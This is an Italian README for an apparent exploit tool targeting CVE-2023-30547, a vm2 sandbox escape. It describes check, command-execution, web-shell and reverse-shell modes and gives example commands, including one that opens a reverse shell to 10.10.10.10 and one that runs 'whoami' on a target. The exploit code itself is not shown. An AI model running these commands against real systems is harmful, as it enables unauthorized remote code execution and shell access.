
Strumento per esplorare CVE-2023-30547

vm2 è una sandbox che può eseguire codice non attendibile con i moduli integrati di Node nella whitelist.
Esiste una vulnerabilità nella sanitizzazione delle eccezioni di vm2 per le versioni fino alla 3.9.16, che consente agli aggressori di sollevare un'eccezione host non sanificata all'interno di handleException(), utilizzabile per evadere dalla sandbox ed eseguire codice arbitrario nel contesto dell'host.
Questo strumento è un semplice script Python che può essere utilizzato per esplorare la vulnerabilità. Ha 4 modalità:
check: verifica se il target è vulnerabile.command_execution_execution: esegue un comando sul target.web_shell: apre una web shell sul target.reverse_shell: apre una reverse shell sul target.usage: CVE-2023-30547.py [-h] -m {check,command_execution,web_shell,reverse_shell} -t TARGET [-c COMMAND] [-p PORT] [-i IP]
Tool for exploring CVE-2023-30547.
options:
-h, --help show this help message and exit
-m {check,command_execution,web_shell,reverse_shell}, --mode {check,command_execution,web_shell,reverse_shell}
Mode to run the tool in.
-t TARGET, --target TARGET
Target to run the tool against.
-c COMMAND, --command COMMAND
Command to execute in exploit mode.
-p PORT, --port PORT Local port to use for reverse shell.
-i IP, --ip IP Local ip to use for reverse shell.
python3 CVE-2023-30547.py -m check -t http://url.com/run
python3 CVE-2023-30547.py -m reverse_shell -t domain.com/run -p 1234 -i 10.10.10.10
python3 CVE-2023-30547.py -m web_shell -t domain.com/run
python3 CVE-2023-30547.py -m command_execution -t domain.com -c 'whoami'